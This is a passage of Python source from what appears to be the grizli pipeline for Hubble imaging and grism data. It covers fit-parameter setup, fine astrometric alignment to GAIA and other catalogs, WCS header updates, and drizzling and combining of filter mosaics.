t0 = utils.load_templates(fwhm=fwhm, line_complexes=True, stars=False, full_line_list=None, continuum_list=None, fsps_templates=fsps, alf_template=True, lorentz=lorentz)
t1 = utils.load_templates(fwhm=fwhm, line_complexes=False, stars=False, full_line_list=None, continuum_list=None, fsps_templates=fsps, alf_template=True, lorentz=lorentz)
args = fitting.run_all(0, t0=t0, t1=t1, fwhm=1200, zr=zr, dz=dz, fitter=fitter, group_name=field_root, fit_stacks=False, prior=prior, fcontam=fcontam, pline=pline, min_sens=min_sens, mask_sn_limit=np.inf, fit_beams=False, root=field_root, fit_trace_shift=fit_trace_shift, phot=phot, use_phot_obj=use_phot_obj, verbose=True, scale_photometry=False, show_beams=True, overlap_threshold=10, get_ir_psfs=True, fit_only_beams=fit_only_beams, MW_EBV=MW_EBV, sys_err=sys_err, get_dict=True)
# EAZY-py photometry object from HST photometry
try:
import eazy.photoz
HAS_EAZY = True
except:
HAS_EAZY = False
if include_photometry & HAS_EAZY:
aper_ix = include_photometry*1
utils.set_warnings()
total_flux = 'flux_auto'
obj = photoz.eazy_photoz(field_root, object_only=True,
apply_prior=False, beta_prior=True, aper_ix=aper_ix-1,
force=True,
get_external_photometry=False, compute_residuals=False,
total_flux=total_flux)
cat = obj.cat
#apcorr = cat['flux_iso']/(cat['flux_auto']*cat['tot_corr'])
apcorr = None
phot_obj = photoz.EazyPhot(obj, grizli_templates=t0,
source_text='grizli_HST_photometry',
apcorr=apcorr,
include_photometry=True, include_pz=False)
args['phot_obj'] = phot_obj
args['scale_photometry'] = True
np.save(save_file, [args])
print('Saved arguments to {0}.'.format(save_file))
return args
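# Minimal usage sketch for generate_fit_params (hypothetical field name and
# redshift range; adjust to the field actually being processed):
#
#   args = generate_fit_params(field_root='j123456+012345', zr=[0.1, 3.0],
#                              fwhm=1200, save_file='fit_args.npy')
#
# The saved 'fit_args.npy' is the args_file picked up by the extraction and
# fitting steps above.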
def summary_catalog(**kwargs):
from . import summary
res = summary.summary_catalog(**kwargs)
return res
def fine_alignment(field_root='j142724+334246', HOME_PATH='/Volumes/Pegasus/Grizli/Automatic/', min_overlap=0.2, stopme=False, ref_err=1.e-3, radec=None, redrizzle=True, shift_only=True, maglim=[17, 24], NITER=1, catalogs=['GAIA', 'PS1', 'NSC', 'SDSS', 'WISE'], method='Powell', radius=5., program_str=None, match_str=[], all_visits=None, date=None, gaia_by_date=False, tol=None, fit_options=None, print_options={'precision': 3, 'sign': ' '}, include_internal_matches=True, master_gaia_catalog=None):
"""
Try fine alignment from visit-based SExtractor catalogs
Parameters
----------
Returns
-------
"""
import os
import glob
import time
try:
from .. import prep, utils
from ..prep import get_radec_catalog, get_gaia_radec_at_time
from ..utils import transform_wcs
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.fine_alignment')
except:
from grizli import prep, utils
from grizli.prep import get_radec_catalog
from grizli.utils import transform_wcs
import numpy as np
np.set_printoptions(**print_options)
import matplotlib.pyplot as plt
from shapely.geometry import Polygon
from scipy.spatial import ConvexHull
from drizzlepac import updatehdr
import astropy.units as u
from scipy.optimize import minimize, fmin_powell
import copy
if all_visits is None:
_ = np.load(f'{field_root}_visits.npy', allow_pickle=True)
all_visits, all_groups, info = _
failed_list = glob.glob('*failed')
visits = []
files = []
for visit in all_visits:
file = '{0}.cat.fits'.format(visit['product'])
if visit['product']+'.failed' in failed_list:
continue
if os.path.exists(file):
if program_str is not None:
prog = visit['product'].split('-')[-4]
if prog != program_str:
continue
if len(match_str) > 0:
has_match = False
for m in match_str:
has_match |= m in visit['product']
if not has_match:
continue
visits.append(visit)
files.append(file)
if radec is None:
ra_i, dec_i = np.median(info['RA_TARG']), np.median(info['DEC_TARG'])
print('Center coordinate: ', ra_i, dec_i)
if date is not None:
radec, ref_catalog = get_radec_catalog(ra=ra_i, dec=dec_i,
product=field_root, date=date,
reference_catalogs=catalogs, radius=radius)
else:
radec, ref_catalog = get_radec_catalog(ra=ra_i, dec=dec_i,
product=field_root,
reference_catalogs=catalogs, radius=radius)
#ref = 'j152643+164738_sdss.radec'
ref_tab = utils.GTable(np.loadtxt(radec, unpack=True).T,
names=['ra', 'dec'])
ridx = np.arange(len(ref_tab))
# Global GAIA DR2 catalog
if gaia_by_date:
if master_gaia_catalog is not None:
msg = (f'Master gaia catalog: {master_gaia_catalog}')
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
gaia_tab = utils.read_catalog(master_gaia_catalog)
else:
dra = np.max(np.abs(info['RA_TARG']-ra_i))
dde = np.max(np.abs(info['DEC_TARG']-dec_i))
drad = np.sqrt((dra*np.cos(dec_i/180*np.pi))**2+(dde**2))*60+2
msg = (f'Get field GAIA catalog ({ra_i:.6f}, {dec_i:.6f})' +
f' r={drad:.1f}arcmin')
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
gaia_tab = prep.get_gaia_DR2_vizier(ra=ra_i, dec=dec_i,
radius=drad)
# Done
msg = f'GAIA catalog: {len(gaia_tab)} objects'
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
if len(gaia_tab) == 0:
msg = f'!No GAIA objects found, will run without absolute frame'
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
gaia_tab = None
else:
gaia_tab = None
# Find matches
tab = {}
for i, file in enumerate(files):
tab[i] = {}
t_i = utils.GTable.gread(file)
mclip = (t_i['MAG_AUTO'] > maglim[0]) & (t_i['MAG_AUTO'] < maglim[1])
if mclip.sum() == 0:
continue
tab[i]['cat'] = t_i[mclip]
try:
sci_file = glob.glob(file.replace('.cat', '_dr?_sci'))[0]
except:
sci_file = glob.glob(file.replace('.cat', '_wcs'))[0]
im = pyfits.open(sci_file)
tab[i]['wcs'] = pywcs.WCS(im[0].header)
tab[i]['transform'] = [0, 0, 0, 1]
tab[i]['xy'] = np.array([tab[i]['cat']['X_IMAGE'], tab[i]['cat']['Y_IMAGE']]).T
tab[i]['match_idx'] = {}
if gaia_by_date & (gaia_tab is not None):
drz_file = glob.glob(file.replace('.cat.fits',
'*dr?_sci.fits'))[0]
drz_im = pyfits.open(drz_file)
coo = get_gaia_radec_at_time(gaia_tab,
date=drz_im[0].header['EXPSTART'],
format='mjd')
ok = np.isfinite(coo.ra+coo.dec)
ref_tab = utils.GTable()
if ok.sum() == 0:
ref_tab['ra'] = [0.]
ref_tab['dec'] = [-89.]
else:
ref_tab['ra'] = coo.ra[ok].value
ref_tab['dec'] = coo.dec[ok].value
prod = '-'.join(file.split('-')[:-1])
prep.table_to_radec(ref_tab, f'{prod}_gaia.radec')
# radec, ref_catalog = get_radec_catalog(ra=drz_im[0].header['CRVAL1'],
# dec=drz_im[0].header['CRVAL2'],
# product='-'.join(file.split('-')[:-1]), date=drz_im[0].header['EXPSTART'], date_format='mjd',
# reference_catalogs=['GAIA'], radius=radius)
#
# ref_tab = utils.GTable(np.loadtxt(radec, unpack=True).T, names=['ra', 'dec'])
ridx = np.arange(len(ref_tab))
tab[i]['ref_tab'] = ref_tab
idx, dr = tab[i]['cat'].match_to_catalog_sky(ref_tab)
clip = dr < 0.6*u.arcsec
if clip.sum() > 1:
tab[i]['match_idx'][-1] = [idx[clip], ridx[clip]]
msg = '{0} Ncat={1} Nref={2}'
utils.log_comment(utils.LOGFILE,
msg.format(sci_file, mclip.sum(), clip.sum()),
show_date=False,
verbose=True)
# ix, jx = tab[i]['match_idx'][-1]
# ci = tab[i]['cat']#[ix]
# cj = ref_tab#[jx]
if include_internal_matches:
for i, file in enumerate(files):
for j in range(i+1, len(files)):
sidx = np.arange(len(tab[j]['cat']))
idx, dr = tab[i]['cat'].match_to_catalog_sky(tab[j]['cat'])
clip = dr < 0.3*u.arcsec
print(file, files[j], clip.sum())
if clip.sum() < 5:
continue
if clip.sum() > 0:
tab[i]['match_idx'][j] = [idx[clip], sidx[clip]]
#ref_err = 0.01
# shift_only=True
if shift_only > 0:
# Shift only
p0 = np.vstack([[0, 0] for i in tab])
pscl = np.array([10., 10.])
elif shift_only < 0:
# Shift + rot + scale
p0 = np.vstack([[0, 0, 0, 1] for i in tab])
pscl = np.array([10., 10., 100., 100.])
else:
# Shift + rot
p0 = np.vstack([[0, 0, 0] for i in tab])
pscl = np.array([10., 10., 100.])
#ref_err = 0.06
if False:
field_args = (tab, ref_tab, ref_err, shift_only, 'field')
_objfun_align(p0*10., *field_args)
fit_args = (tab, ref_tab, ref_err, shift_only, 'huber')
plot_args = (tab, ref_tab, ref_err, shift_only, 'plot')
plotx_args = (tab, ref_tab, ref_err, shift_only, 'plotx')
pi = p0*1. # *10.
for iter in range(NITER):
fit = minimize(_objfun_align, pi*pscl, args=fit_args, method=method, jac=None, hess=None, hessp=None, bounds=None, constraints=(), tol=tol, callback=None, options=fit_options)
pi = fit.x.reshape((-1, len(pscl)))/pscl
########
# Show the result
fig = plt.figure(figsize=[8, 8])
ax = fig.add_subplot(221)
_objfun_align(p0*pscl, *plot_args)
ax.set_xticklabels([])
ax.set_ylabel('dDec')
ax = fig.add_subplot(223)
_objfun_align(p0*pscl, *plotx_args)
ax.set_ylabel('dDec')
ax.set_xlabel('dRA')
ax = fig.add_subplot(222)
_objfun_align(fit.x, *plot_args)
ax.set_yticklabels([])
ax.set_xticklabels([])
ax = fig.add_subplot(224)
_objfun_align(fit.x, *plotx_args)
ax.set_yticklabels([])
ax.set_xlabel('dRA')
for ax in fig.axes:
ax.grid()
ax.set_xlim(-0.35, 0.35)
ax.set_ylim(-0.35, 0.35)
fig.tight_layout(pad=0.5)
extra_str = ''
if program_str:
extra_str += '.{0}'.format(program_str)
if match_str:
extra_str += '.{0}'.format('.'.join(match_str))
fig.text(0.97, 0.02, time.ctime(), ha='right', va='bottom', fontsize=5, transform=fig.transFigure)
fig.savefig('{0}{1}_fine.png'.format(field_root, extra_str))
np.save('{0}{1}_fine.npy'.format(field_root, extra_str), [visits, fit])
return tab, fit, visits
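# Hedged example of the fine-alignment workflow (hypothetical field name):
#
#   tab, fit, visits = fine_alignment(field_root='j123456+012345',
#                                     shift_only=True, catalogs=['GAIA'])
#   update_wcs_headers_with_fine('j123456+012345', backup=True)
#
# The second step applies the solved shifts/rotations stored in the
# '{field_root}*_fine.npy' file back to the exposure headers.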
def update_wcs_headers_with_fine(field_root, backup=True):
"""
Update grism headers with the fine shifts
"""
import os
import numpy as np
import glob
import astropy.io.fits as pyfits
import astropy.wcs as pywcs
from drizzlepac import updatehdr
#import grizli.prep
try:
from .. import prep
except:
from grizli import prep
if backup:
if not os.path.exists('FineBkup'):
os.mkdir('FineBkup')
visits, all_groups, info = np.load(f'{field_root}_visits.npy',
allow_pickle=True)
fit_files = glob.glob('{0}*fine.npy'.format(field_root))
for fit_file in fit_files:
fine_visits, fine_fit = np.load(fit_file, allow_pickle=True)
N = len(fine_visits)
if backup:
for i in range(N):
direct = fine_visits[i]
for file in direct['files']:
os.system(f'cp {file} FineBkup/')
print(file)
trans = np.reshape(fine_fit.x, (N, -1)) # /10.
sh = trans.shape
if sh[1] == 2:
pscl = np.array([10., 10.])
trans = np.hstack([trans/pscl, np.zeros((N, 1)), np.ones((N, 1))])
elif sh[1] == 3:
pscl = np.array([10., 10., 100])
trans = np.hstack([trans/pscl, np.ones((N, 1))])
elif sh[1] == 4:
pscl = np.array([10., 10., 100, 100])
trans = trans/pscl
# Update direct WCS
for ix, direct in enumerate(fine_visits):
#direct = visits[ix]
out_shift, out_rot = trans[ix, :2], trans[ix, 2]
out_scale = trans[ix, 3]
xyscale = trans[ix, :4]
xyscale[2] *= -1
out_rot *= -1
try:
wcs_ref_file = str('{0}.cat.fits'.format(direct['product']))
wcs_ref = pywcs.WCS(pyfits.open(wcs_ref_file)['WCS'].header,
relax=True)
except:
wcs_ref_file = str('{0}_wcs.fits'.format(direct['product']))
wcs_ref = pywcs.WCS(pyfits.open(wcs_ref_file)[0].header,
relax=True)
for file in direct['files']:
prep.update_wcs_fits_log(file, wcs_ref,
xyscale=xyscale,
initialize=False,
replace=('.fits', '.wcslog.fits'),
wcsname='FINE')
updatehdr.updatewcs_with_shift(file,
wcs_ref_file,
xsh=out_shift[0], ysh=out_shift[1],
rot=out_rot, scale=out_scale,
wcsname='FINE', force=True,
reusename=True, verbose=True,
sciext='SCI')
# Bug in astrodrizzle? Dies if the FLT files don't have MJD-OBS
# keywords
im = pyfits.open(file, mode='update')
im[0].header['MJD-OBS'] = im[0].header['EXPSTART']
im.flush()
# Update grism WCS
for i in range(len(all_groups)):
direct = all_groups[i]['direct']
grism = all_groups[i]['grism']
for j in range(N):
if fine_visits[j]['product'] == direct['product']:
print(direct['product'], grism['product'], trans[j, :])
if backup:
for file in grism['files']:
os.system(f'cp {file} FineBkup/')
print(file)
prep.match_direct_grism_wcs(direct=direct, grism=grism,
get_fresh_flt=False,
xyscale=trans[j, :])
def make_reference_wcs(info, files=None, output='mosaic_wcs-ref.fits', filters=['G800L', 'G102', 'G141'], pad_reference=90, pixel_scale=None, get_hdu=True):
"""
Make a reference image WCS based on the grism exposures
Parameters
----------
info : `~astropy.table.Table`
Exposure information table with columns 'FILE' and 'FILTER'.
output : str, None
Filename for output wcs reference image.
filters : list or None
List of filters to consider for the output mosaic. If None, then
use all exposures in the `info` list.
pad_reference : float
Image padding, in `~astropy.units.arcsec`.
pixel_scale : None or float
Pixel scale in `~astropy.units.arcsec`. If None, the script computes it
automatically (0.03" for ACS-only data, otherwise 0.06").
get_hdu : bool
If True, then generate an `~astropy.io.fits.ImageHDU` object and
save to a file if `output` is defined. If False, return just the
computed `~astropy.wcs.WCS`.
Returns
-------
`~astropy.io.fits.ImageHDU` or `~astropy.wcs.WCS`, see `get_hdu`.
"""
if filters is not None:
use = utils.column_values_in_list(info['FILTER'], filters)
if use.sum() == 0:
# All files
files = info['FILE']
else:
files = info['FILE'][use]
else:
files = info['FILE']
# Just ACS, pixel scale 0.03
if pixel_scale is None:
# Auto determine pixel size, 0.03" pixels if only ACS, otherwise 0.06
any_grism = utils.column_values_in_list(info['FILTER'],
['G800L', 'G102', 'G141'])
acs_grism = (info['FILTER'] == 'G800L')
only_acs = list(np.unique(info['INSTRUME'])) == ['ACS']
if ((acs_grism.sum() == any_grism.sum()) & (any_grism.sum() > 0)) | (only_acs):
pixel_scale = 0.03
else:
pixel_scale = 0.06
ref_hdu = utils.make_maximal_wcs(files, pixel_scale=pixel_scale,
get_hdu=get_hdu, pad=pad_reference,
verbose=True)
if get_hdu:
ref_hdu.data = ref_hdu.data.astype(np.int16)
if output is not None:
ref_hdu.writeto(output, overwrite=True, output_verify='fix')
return ref_hdu
else:
return ref_hdu[1]
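# Example (sketch): build a grism-optimized reference WCS from the exposure
# info table produced by parse_visits (hypothetical field root):
#
#   visits, groups, info = np.load('{0}_visits.npy'.format(root),
#                                  allow_pickle=True)
#   ref_hdu = make_reference_wcs(info, output='mosaic_wcs-ref.fits',
#                                filters=['G800L', 'G102', 'G141'])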
def drizzle_overlaps(field_root, filters=['F098M', 'F105W', 'F110W', 'F125W', 'F140W', 'F160W'], ref_image=None, ref_wcs=None, bits=None, pixfrac=0.75, scale=0.06, make_combined=False, drizzle_filters=True, skysub=False, skymethod='localmin', match_str=[], context=False, pad_reference=60, min_nexp=2, static=True, skip_products=[], include_saturated=False, multi_driz_cr=False, filter_driz_cr=False, **kwargs):
"""
Drizzle filter groups based on precomputed image associations
"""
import numpy as np
import glob
try:
from .. import prep, utils
except:
from grizli import prep
##############
# Redrizzle
visits, all_groups, info = np.load('{0}_visits.npy'.format(field_root),
allow_pickle=True)
failed_list = glob.glob('*failed')
#overlaps = np.load('{0}_overlaps.npy'.format(field_root))[0]
#keep = []
if make_combined:
if isinstance(make_combined, str):
label = make_combined
else:
label = 'ir'
else:
label = 'ir'
wfc3ir = {'product': '{0}-{1}'.format(field_root, label), 'files': []}
if ref_image is not None:
wfc3ir['reference'] = ref_image
if ref_wcs is not None:
wfc3ir['reference_wcs'] = ref_wcs
filter_groups = {}
for visit in visits:
# Visit failed for some reason
if (visit['product']+'.wcs_failed' in failed_list) | (visit['product']+'.failed' in failed_list) | (visit['product'] in skip_products):
continue
# Too few exposures (e.g., a single exposure with unreliable CR flags)
if len(visit['files']) < min_nexp:
continue
# Not one of the desired filters
filt = visit['product'].split('-')[-1]
if filt.upper() not in filters:
continue
# Are all of the exposures in ./?
has_exposures = True
for file in visit['files']:
has_exposures &= os.path.exists('../Prep/'+file)
if not has_exposures:
print('Visit {0} missing exposures, skip'.format(visit['product']))
continue
# IS UVIS?
if visit['files'][0].startswith('i') & ('_flc' in visit['files'][0]):
filt += 'u'
is_uvis = True
else:
is_uvis = False
if len(match_str) > 0:
has_match = False
for m in match_str:
has_match |= m in visit['product']
if not has_match:
continue
if filt not in filter_groups:
filter_groups[filt] = {'product': '{0}-{1}'.format(field_root, filt), 'files': [], 'reference': ref_image, 'reference_wcs': ref_wcs}
filter_groups[filt]['files'].extend(visit['files'])
# Add polygon
if 'footprints' in visit:
for fp in visit['footprints']:
if 'footprint' in filter_groups[filt]:
filter_groups[filt]['footprint'] = filter_groups[filt]['footprint'].union(fp)
else:
filter_groups[filt]['footprint'] = fp.buffer(0)
if (filt.upper() in filters) | (is_uvis & (filt.upper()[:-1] in filters)):
wfc3ir['files'].extend(visit['files'])
if 'footprint' in filter_groups[filt]:
fp_i = filter_groups[filt]['footprint']
if 'footprint' in wfc3ir:
wfc3ir['footprint'] = wfc3ir['footprint'].union(fp_i)
else:
wfc3ir['footprint'] = fp_i.buffer(0)
if len(filter_groups) == 0:
print('No filters found ({0})'.format(filters))
return None
keep = [filter_groups[k] for k in filter_groups]
if (ref_image is None) & (ref_wcs is None):
print('\nCompute mosaic WCS: {0}_wcs-ref.fits\n'.format(field_root))
ref_hdu = utils.make_maximal_wcs(wfc3ir['files'], pixel_scale=scale, get_hdu=True, pad=pad_reference, verbose=True)
ref_hdu.writeto('{0}_wcs-ref.fits'.format(field_root), overwrite=True,
output_verify='fix')
wfc3ir['reference'] = '{0}_wcs-ref.fits'.format(field_root)
for i in range(len(keep)):
keep[i]['reference'] = '{0}_wcs-ref.fits'.format(field_root)
if ref_wcs is not None:
pass
#
if make_combined:
# Figure out if we have more than one instrument
inst_keys = np.unique([os.path.basename(file)[0] for file in wfc3ir['files']])
prep.drizzle_overlaps([wfc3ir], parse_visits=False, pixfrac=pixfrac, scale=scale, skysub=False, bits=bits, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False, context=context, static=(static & (len(inst_keys) == 1)), include_saturated=include_saturated, run_driz_cr=multi_driz_cr, **kwargs)
np.save('{0}.npy'.format(wfc3ir['product']), [wfc3ir])
if drizzle_filters:
print('Drizzle mosaics in filters: {0}'.format(filter_groups.keys()))
prep.drizzle_overlaps(keep, parse_visits=False, pixfrac=pixfrac, scale=scale, skysub=skysub, skymethod=skymethod, bits=bits, final_wcs=True, final_rot=0, final_outnx=None, final_outny=None, final_ra=None, final_dec=None, final_wht_type='IVM', final_wt_scl='exptime', check_overlaps=False, context=context, static=static, include_saturated=include_saturated, run_driz_cr=filter_driz_cr, **kwargs)
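# Sketch of a typical call (hypothetical field root); drizzles each IR filter
# onto a common reference image without making the combined stack:
#
#   drizzle_overlaps('j123456+012345',
#                    filters=['F105W', 'F125W', 'F160W'],
#                    ref_image='j123456+012345_wcs-ref.fits',
#                    make_combined=False, pixfrac=0.75, scale=0.06)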
FILTER_COMBINATIONS = {'ir': IR_M_FILTERS+IR_W_FILTERS,
'opt': OPT_M_FILTERS+OPT_W_FILTERS}
def make_filter_combinations(root, weight_fnu=True, filter_combinations=FILTER_COMBINATIONS, min_count=1):
"""
Combine ir/opt mosaics manually scaling a specific zeropoint
"""
# Output normalization os F814W/F140W
ref_h = {}
ref_h['opt'] = {'INSTRUME': 'ACS', 'DETECTOR': 'WFC',
'PHOTFLAM': 7.0178627203125e-20,
'PHOTBW': 653.24393453125, 'PHOTZPT': -21.1,
'PHOTMODE': 'ACS WFC1 F814W MJD#56438.5725',
'PHOTPLAM': 8045.415190625002,
'FILTER1': 'CLEAR1L', 'FILTER2': 'F814W'}
ref_h['ir'] = {'INSTRUME': 'WFC3', 'DETECTOR': 'IR',
'PHOTFNU': 9.5291135e-08,
'PHOTFLAM': 1.4737148e-20,
'PHOTBW': 1132.39, 'PHOTZPT': -21.1,
'PHOTMODE': 'WFC3 IR F140W',
'PHOTPLAM': 13922.907, 'FILTER': 'F140W'}
####
count = {}
num = {}
den = {}
for f in filter_combinations:
num[f] = None
den[f] = None
count[f] = 0
output_sci = {}
head = {}
sci_files = glob.glob('{0}-f*sci.fits*'.format(root))
for sci_file in sci_files:
filt_i = sci_file.split('_dr')[0].split('-')[-1]
filt_ix = sci_file.split('_dr')[0].split('-')[-1]
# UVIS
if filt_i.startswith('f') & filt_i.endswith('u'):
filt_i = filt_i[:-1]
band = None
for f in filter_combinations:
if filt_i.upper() in filter_combinations[f]:
band = f
break
if band is None:
continue
# Which reference parameters to use?
if filt_i.upper() in OPT_W_FILTERS + OPT_M_FILTERS:
ref_h_i = ref_h['opt']
else:
ref_h_i = ref_h['ir']
print(sci_file, filt_i, band)
output_sci[band] = sci_file.replace(filt_ix, band)
im_i = pyfits.open(sci_file)
wht_i = pyfits.open(sci_file.replace('_sci', '_wht'))
photflam = im_i[0].header['PHOTFLAM']
ref_photflam = ref_h_i['PHOTFLAM']
photplam = im_i[0].header['PHOTPLAM']
ref_photplam = ref_h_i['PHOTPLAM']
head[band] = im_i[0].header.copy()
for k in ref_h_i:
head[band][k] = ref_h_i[k]
if num[band] is None:
num[band] = im_i[0].data*0
den[band] = num[band]*0
scl = photflam/ref_photflam
if weight_fnu:
scl_weight = photplam**2/ref_photplam**2
else:
scl_weight = 1.
den_i = wht_i[0].data/scl**2*scl_weight
num[band] += im_i[0].data*scl*den_i
den[band] += den_i
count[band] += 1
# Done, make outputs
for band in filter_combinations:
if (num[band] is not None) & (count[band] >= min_count):
sci = num[band]/den[band]
wht = den[band]
mask = (~np.isfinite(sci)) | (den[band] == 0)
sci[mask] = 0
wht[mask] = 0
print('Write {0}'.format(output_sci[band]))
pyfits.PrimaryHDU(data=sci, header=head[band]).writeto(output_sci[band], overwrite=True, output_verify='fix')
pyfits.PrimaryHDU(data=wht, header=head[band]).writeto(output_sci[band].replace('_sci', '_wht'), overwrite=True, output_verify='fix')
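# The combination above is an inverse-variance weighted mean in the reference
# photometric system:  scl_i = PHOTFLAM_i / PHOTFLAM_ref,
# w_i = wht_i / scl_i**2 (times PHOTPLAM_i**2 / PHOTPLAM_ref**2 when
# weight_fnu=True), and
#   sci_combined = sum(sci_i * scl_i * w_i) / sum(w_i),  wht_combined = sum(w_i)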
def make_combined_mosaics(root, fix_stars=False, mask_spikes=False, skip_single_optical_visits=True, mosaic_args=args['mosaic_args'], mosaic_driz_cr_type=0, mosaic_drizzle_args=args['mosaic_drizzle_args'], **kwargs):
"""
Drizzle combined mosaics
mosaic_driz_cr_type : int
(mosaic_driz_cr_type & 1) : flag CRs on all IR combined
(mosaic_driz_cr_type & 2) : flag CRs on IR filter combinations
(mosaic_driz_cr_type & 4) : flag CRs on all OPT combined
(mosaic_driz_cr_type & 8) : flag CRs on OPT filter combinations
"""
# if False:
# # j = 125+110w
# auto_script.field_rgb('j013804m2156', HOME_PATH=None, show_ir=True, filters=['f160w','j','f105w'], xsize=16, rgb_scl=[1, 0.85, 1], rgb_min=-0.003)
visits_file = '{0}_visits.npy'.format(root)
visits, groups, info = np.load(visits_file, allow_pickle=True)
# Mosaic WCS
wcs_ref_file = '{0}_wcs-ref.fits'.format(root)
if not os.path.exists(wcs_ref_file):
make_reference_wcs(info, output=wcs_ref_file, get_hdu=True,
**mosaic_args['wcs_params'])
mosaic_pixfrac = mosaic_args['mosaic_pixfrac']
combine_all_filters = mosaic_args['combine_all_filters']
# # Combine all available filters?
# if combine_all_filters:
# all_filters = mosaic_args['ir_filters'] + mosaic_args['optical_filters']
# auto_script.drizzle_overlaps(root,
# filters=all_filters,
# min_nexp=1, pixfrac=mosaic_pixfrac,
# make_combined=True,
# ref_image=wcs_ref_file,
# drizzle_filters=False)
# IR filters
# if 'fix_stars' in visit_prep_args:
# fix_stars = visit_prep_args['fix_stars']
# else:
# fix_stars = False
drizzle_overlaps(root, filters=mosaic_args['ir_filters'], min_nexp=1,
pixfrac=mosaic_pixfrac,
make_combined=False,
ref_image=wcs_ref_file, include_saturated=fix_stars,
multi_driz_cr=(mosaic_driz_cr_type & 1) > 0,
filter_driz_cr=(mosaic_driz_cr_type & 2) > 0,
**mosaic_drizzle_args)
make_filter_combinations(root, weight_fnu=True, min_count=1,
filter_combinations={'ir': IR_M_FILTERS+IR_W_FILTERS})
# Mask diffraction spikes
ir_mosaics = glob.glob('{0}-f*drz_sci.fits'.format(root))
if (len(ir_mosaics) > 0) & (mask_spikes):
cat = prep.make_SEP_catalog('{0}-ir'.format(root), threshold=4,
save_fits=False,
column_case=str.lower)
selection = (cat['mag_auto'] < 18) & (cat['flux_radius'] < 4.5)
selection |= (cat['mag_auto'] < 15.2) & (cat['flux_radius'] < 20)
# Bright GAIA stars to catch things with bad photometry
if True:
print('## Include GAIA stars in spike mask')
ra_center = np.median(cat['ra'])
dec_center = np.median(cat['dec'])
rad_arcmin = np.sqrt((cat['ra']-ra_center)**2*np.cos(cat['dec']/180*np.pi)**2+(cat['dec']-dec_center)**2)*60
try:
gaia_tmp = prep.get_gaia_DR2_catalog(ra_center, dec_center,
radius=rad_arcmin.max()*1.1, use_mirror=False)
idx, dr = utils.GTable(gaia_tmp).match_to_catalog_sky(cat)
gaia_match = (dr.value < 0.5)
gaia_match &= (gaia_tmp['phot_g_mean_mag'][idx] < 20)
gaia_match &= (cat['mag_auto'] < 17.5)
selection |= gaia_match
except:
print('## Include GAIA stars in spike mask - failed')
pass
# Note: very bright stars could still be saturated and the spikes
# might not be big enough given their catalog mag
msg = '\n### mask_spikes: {0} stars\n\n'.format(selection.sum())
utils.log_comment(utils.LOGFILE, msg, show_date=True,
verbose=True)
if selection.sum() > 0:
for visit in visits:
filt = visit['product'].split('-')[-1]
if filt[:2] in ['f0', 'f1']:
mask_IR_psf_spikes(visit=visit, selection=selection,
cat=cat, minR=8, dy=5)
# Remake mosaics
drizzle_overlaps(root, filters=mosaic_args['ir_filters'],
min_nexp=1,
pixfrac=mosaic_pixfrac,
make_combined=False,
ref_image=wcs_ref_file,
include_saturated=fix_stars,
**mosaic_drizzle_args)
make_filter_combinations(root, weight_fnu=True, min_count=1,
filter_combinations={'ir': IR_M_FILTERS+IR_W_FILTERS})
# More IR filter combinations for mosaics
if False:
extra_combinations = {'h': ['F140W', 'F160W'],
'yj': ['F098M', 'F105W', 'F110W', 'F125W']}
make_filter_combinations(root, weight_fnu=True, min_count=2,
filter_combinations=extra_combinations)
# Optical filters
mosaics = glob.glob('{0}-ir_dr?_sci.fits'.format(root))
if (mosaic_args['half_optical_pixscale']): # & (len(mosaics) > 0):
# Drizzle optical images to half the pixel scale determined for
# the IR mosaics. The optical mosaics can be 2x2 block averaged
# to match the IR images.
ref = pyfits.open('{0}_wcs-ref.fits'.format(root))
try:
h = ref[1].header.copy()
_ = h['CRPIX1']
except:
h = ref[0].header.copy()
for k in ['NAXIS1', 'NAXIS2', 'CRPIX1', 'CRPIX2']:
h[k] *= 2
h['CRPIX1'] -= 0.5
h['CRPIX2'] -= 0.5
for k in ['CD1_1', 'CD2_2']:
h[k] /= 2
wcs_ref_optical = '{0}-opt_wcs-ref.fits'.format(root)
data = np.zeros((h['NAXIS2'], h['NAXIS1']), dtype=np.int16)
pyfits.writeto(wcs_ref_optical, header=h, data=data, overwrite=True)
else:
wcs_ref_optical = wcs_ref_file
if len(mosaics) == 0:
# Call a single combined mosaic "ir" for detection catalogs, etc.
make_combined_label = 'ir'
else:
# Make a separate optical combined image
make_combined_label = 'opt'
drizzle_overlaps(root, filters=mosaic_args['optical_filters'],
pixfrac=mosaic_pixfrac, make_combined=False,
ref_image=wcs_ref_optical,
min_nexp=1+skip_single_optical_visits*1,
multi_driz_cr=(mosaic_driz_cr_type & 4) > 0,
filter_driz_cr=(mosaic_driz_cr_type & 8) > 0,
**mosaic_drizzle_args)
make_filter_combinations(root, weight_fnu=True, min_count=1,
filter_combinations={make_combined_label: OPT_M_FILTERS+OPT_W_FILTERS})
# Fill IR filter mosaics with scaled combined data so they can be used
# as grism reference
fill_mosaics = mosaic_args['fill_mosaics']
if fill_mosaics:
if fill_mosaics == 'grism':
# Only fill mosaics if grism filters exist
has_grism = utils.column_string_operation(info['FILTER'],
['G141', 'G102', 'G800L'],
'count', 'or').sum() > 0
if has_grism:
fill_filter_mosaics(root)
else:
fill_filter_mosaics(root)
# Remove the WCS reference files
for file in [wcs_ref_optical, wcs_ref_file]:
if os.path.exists(file):
os.remove(file)
def make_mosaic_footprints(field_root):
"""
Make region files where wht images nonzero
"""
import matplotlib.pyplot as plt
files = glob.glob('{0}-f*dr?_wht.fits'.format(field_root))
files.sort()
fp = open('{0}_mosaic.reg'.format(field_root), 'w')
fp.write('fk5\n')
fp.close()
for weight_image in files:
filt = weight_image.split('_dr')[0].split('-')[-1]
wave = filt[1:4]
if wave[0] in '01':
w = float(wave)*10
else:
w = float(wave)
wint = np.clip(np.interp(np.log10(w/800), [-0.3, 0.3], [0, 1]), 0, 1)
print(filt, w, wint)
clr = utils.RGBtoHex(plt.cm.Spectral_r(wint))
#plt.scatter([0],[0], color=clr, label=filt)
reg = prep.drizzle_footprint(weight_image, shrink=10, ext=0, outfile=None, label=filt) + ' color={0}\n'.format(clr)
fp = open('{0}_mosaic.reg'.format(field_root), 'a')
fp.write(reg)
